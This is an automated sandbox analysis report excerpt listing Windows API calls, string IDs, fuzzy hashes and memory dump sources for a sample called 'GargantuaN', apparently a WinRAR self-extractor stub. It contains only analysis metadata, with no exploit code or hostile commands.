                                                        • _free.LIBCMT ref: 00D7CBD2
                                                        • _free.LIBCMT ref: 00D7CBE0
                                                        • _free.LIBCMT ref: 00D7CBEB
                                                        • _free.LIBCMT ref: 00D7CC23
                                                        • _free.LIBCMT ref: 00D7CC2A
                                                        • _free.LIBCMT ref: 00D7CC47
                                                        • _free.LIBCMT ref: 00D7CC5F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                         Uniqueness
                                                         • Uniqueness Score: -1.00%
                                                        APIs
                                                        • GetWindow.USER32(?,00000005), ref: 00D6D6C1
                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 00D6D6ED
                                                          • Part of subcall function 00D61FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D5C116,00000000,.exe,?,?,00000800,?,?,?,00D68E3C), ref: 00D61FD1
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00D6D709
                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D6D720
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00D6D734
                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D6D75D
                                                        • DeleteObject.GDI32(00000000), ref: 00D6D764
                                                        • GetWindow.USER32(00000000,00000002), ref: 00D6D76D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                        • String ID: STATIC
                                                        • API String ID: 3820355801-1882779555
                                                         Uniqueness
                                                         • Uniqueness Score: -1.00%
                                                        APIs
                                                        • _free.LIBCMT ref: 00D79705
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D79711
                                                        • _free.LIBCMT ref: 00D7971C
                                                        • _free.LIBCMT ref: 00D79727
                                                        • _free.LIBCMT ref: 00D79732
                                                        • _free.LIBCMT ref: 00D7973D
                                                        • _free.LIBCMT ref: 00D79748
                                                        • _free.LIBCMT ref: 00D79753
                                                        • _free.LIBCMT ref: 00D7975E
                                                        • _free.LIBCMT ref: 00D7976C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                         Uniqueness
                                                         • Uniqueness Score: -1.00%
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 322700389-393685449
                                                         Uniqueness
                                                         • Uniqueness Score: -1.00%
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D56FAA
                                                        • _wcslen.LIBCMT ref: 00D57013
                                                        • _wcslen.LIBCMT ref: 00D57084
                                                          • Part of subcall function 00D57A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57AAB
                                                          • Part of subcall function 00D57A9C: GetLastError.KERNEL32 ref: 00D57AF1
                                                          • Part of subcall function 00D57A9C: CloseHandle.KERNEL32(?), ref: 00D57B00
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                        • API String ID: 3122303884-3508440684
                                                         Uniqueness
                                                         • Uniqueness Score: -1.00%
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00D69736
                                                        • _wcslen.LIBCMT ref: 00D697D6
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00D697E5
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D69806
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                        • API String ID: 1116704506-4209811716
                                                         Uniqueness
                                                         • Uniqueness Score: -1.00%
                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • EndDialog.USER32(?,00000001), ref: 00D6B610
                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D6B637
                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D6B650
                                                        • SetWindowTextW.USER32(?,?), ref: 00D6B661
                                                        • GetDlgItem.USER32(?,00000065), ref: 00D6B66A
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D6B67E
                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D6B694
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                        • String ID: LICENSEDLG
                                                        • API String ID: 3214253823-2177901306
                                                         Uniqueness
                                                         • Uniqueness Score: -1.00%
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B818264F,00000001,00000000,00000000,?,?,00D5AF6C,ROOT\CIMV2), ref: 00D6FD99
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00D5AF6C,ROOT\CIMV2), ref: 00D6FE14
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00D6FE1F
                                                        • _com_issue_error.COMSUPP ref: 00D6FE48
                                                        • _com_issue_error.COMSUPP ref: 00D6FE52
                                                        • GetLastError.KERNEL32(80070057,B818264F,00000001,00000000,00000000,?,?,00D5AF6C,ROOT\CIMV2), ref: 00D6FE57
                                                        • _com_issue_error.COMSUPP ref: 00D6FE6A
                                                        • GetLastError.KERNEL32(00000000,?,?,00D5AF6C,ROOT\CIMV2), ref: 00D6FE80
                                                        • _com_issue_error.COMSUPP ref: 00D6FE93
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                        • String ID:
                                                        • API String ID: 1353541977-0
                                                        • Opcode ID: e2c0f02a5f0d42c478856a0f5e68cdfc04ef2fc0f0939ecbc028976e48792f5b
                                                        • Instruction ID: 5e2b6a2d3cb046fa5807b1a8012ff3f185778a56da34601c7429aa85a691ce5f
                                                        • Opcode Fuzzy Hash: e2c0f02a5f0d42c478856a0f5e68cdfc04ef2fc0f0939ecbc028976e48792f5b
                                                        • Instruction Fuzzy Hash: E241D871A00719AFDB109F68EC45BAEBBA8EF44B10F244239F919E7352D73599008BB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                        • API String ID: 3519838083-3505469590
                                                        • Opcode ID: 564687130e6a5839afb76ac7866743608101bb20d46e1e1429c2ef6355fa30cd
                                                        • Instruction ID: da4aed02a5e3f82df31e5d107ae619050f7bad479f46d7dba4e96e7209abde97
                                                        • Opcode Fuzzy Hash: 564687130e6a5839afb76ac7866743608101bb20d46e1e1429c2ef6355fa30cd
                                                        • Instruction Fuzzy Hash: 1B714C71A00619AFDF14DFA8CC95AAEB7B9FF49711B140259F916E72A0CB30AD05CB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D59387
                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D593AA
                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D593C9
                                                          • Part of subcall function 00D5C29A: _wcslen.LIBCMT ref: 00D5C2A2
                                                          • Part of subcall function 00D61FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D5C116,00000000,.exe,?,?,00000800,?,?,?,00D68E3C), ref: 00D61FD1
                                                        • _swprintf.LIBCMT ref: 00D59465
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • MoveFileW.KERNEL32(?,?), ref: 00D594D4
                                                        • MoveFileW.KERNEL32(?,?), ref: 00D59514
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                        • String ID: rtmp%d
                                                        • API String ID: 3726343395-3303766350
                                                        • Opcode ID: 8ea35fff988fc0725baa76fce5f31f0b2f17a9a8e72737af43c460d057190cc4
                                                        • Instruction ID: 77da4e814b3f7c27473c1114fe25b5da6db58980c63feb111b99b5d3ccbcbecd
                                                        • Opcode Fuzzy Hash: 8ea35fff988fc0725baa76fce5f31f0b2f17a9a8e72737af43c460d057190cc4
                                                        • Instruction Fuzzy Hash: 4A415371900258AADF21ABA0CC55EDEB37CEF45741F0448A5BE49E3151EB388B9D8B74
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __aulldiv.LIBCMT ref: 00D6122E
                                                          • Part of subcall function 00D5B146: GetVersionExW.KERNEL32(?), ref: 00D5B16B
                                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00D61251
                                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00D61263
                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D61274
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D61284
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D61294
                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00D612CF
                                                        • __aullrem.LIBCMT ref: 00D61379
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                        • String ID:
                                                        • API String ID: 1247370737-0
                                                        • Opcode ID: 2837b9c322bdf9a6fe6ff6114032baf3115a23ae6a9712d301f4185fd6e6a44e
                                                        • Instruction ID: 53abd6ecd62a0d7dbe9ba7d91c37afe767df932463d1f0b69a771da4b2e647af
                                                        • Opcode Fuzzy Hash: 2837b9c322bdf9a6fe6ff6114032baf3115a23ae6a9712d301f4185fd6e6a44e
                                                        • Instruction Fuzzy Hash: DB4108B5508305AFC710DF65C88496BBBF9FF88714F14892EF59AC2210E734E649CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _swprintf.LIBCMT ref: 00D52536
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                          • Part of subcall function 00D605DA: _wcslen.LIBCMT ref: 00D605E0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                                        • String ID: ;%u$x%u$xc%u
                                                        • API String ID: 3053425827-2277559157
                                                        • Opcode ID: 1f9c74c0cc6a6a238673dada681dc6e0359e87e6898ce0be792edbedb5c74118
                                                        • Instruction ID: c666ccd9f2270a447a89f70840100484a2357e6446696b1b4dc2ef16dca1afb2
                                                        • Opcode Fuzzy Hash: 1f9c74c0cc6a6a238673dada681dc6e0359e87e6898ce0be792edbedb5c74118
                                                        • Instruction Fuzzy Hash: 88F146706043409BDF25EB2884D5BBE7B959F96301F0C056DECCA9B283CB64994DC7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: </p>$</style>$<br>$<style>$>
                                                        • API String ID: 176396367-3568243669
                                                        • Opcode ID: a88ec1498cfbff223767e859bbcc9c459417eaaf4338d276ccc7f75973916e4f
                                                        • Instruction ID: a324d48ae7a1a15d979e35c3230aa65f81e09f3dd03f065307345d6c7faef486
                                                        • Opcode Fuzzy Hash: a88ec1498cfbff223767e859bbcc9c459417eaaf4338d276ccc7f75973916e4f
                                                        • Instruction Fuzzy Hash: 6E51E66664132397DB309A259832776F3E8DFA1750F6C042AF9C18B1C1FB768C818771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D7FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00D7F6CF
                                                        • __fassign.LIBCMT ref: 00D7F74A
                                                        • __fassign.LIBCMT ref: 00D7F765
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D7F78B
                                                        • WriteFile.KERNEL32(?,00000000,00000000,00D7FE02,00000000,?,?,?,?,?,?,?,?,?,00D7FE02,00000000), ref: 00D7F7AA
                                                        • WriteFile.KERNEL32(?,00000000,00000001,00D7FE02,00000000,?,?,?,?,?,?,?,?,?,00D7FE02,00000000), ref: 00D7F7E3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: b2fc81b7b7d302cfc59796c5f5e9aecfd4ac279f1786c90db4a58c937181fd3b
                                                        • Instruction ID: bda4619a2c39d49afd26700e2239269493730673b62ff6b25c8522b647bd6fe8
                                                        • Opcode Fuzzy Hash: b2fc81b7b7d302cfc59796c5f5e9aecfd4ac279f1786c90db4a58c937181fd3b
                                                        • Instruction Fuzzy Hash: A45187B2D002499FCB24CFA8DC45AEEBBF4EF09710F14816AE559E7251E770A941CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 00D72937
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D7293F
                                                        • _ValidateLocalCookies.LIBCMT ref: 00D729C8
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00D729F3
                                                        • _ValidateLocalCookies.LIBCMT ref: 00D72A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 1170836740-1018135373
                                                        • Opcode ID: 26b94bb236a5377da7c703f4f164cfb5814c8ccd2f79a2ad03c259d666cda7d1
                                                        • Instruction ID: 1251c5737ec28227cf1d1b4339b8be641150df999532c9587fbf86aa2647f58c
                                                        • Opcode Fuzzy Hash: 26b94bb236a5377da7c703f4f164cfb5814c8ccd2f79a2ad03c259d666cda7d1
                                                        • Instruction Fuzzy Hash: 3E41B630A00248AFCF10DF68C881AAE7BB5EF44324F18C156E959AB352E731DA45CFB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ShowWindow.USER32(?,00000000), ref: 00D69EEE
                                                        • GetWindowRect.USER32(?,00000000), ref: 00D69F44
                                                        • ShowWindow.USER32(?,00000005,00000000), ref: 00D69FDB
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00D69FE3
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00D69FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$RectText
                                                        • String ID: RarHtmlClassName
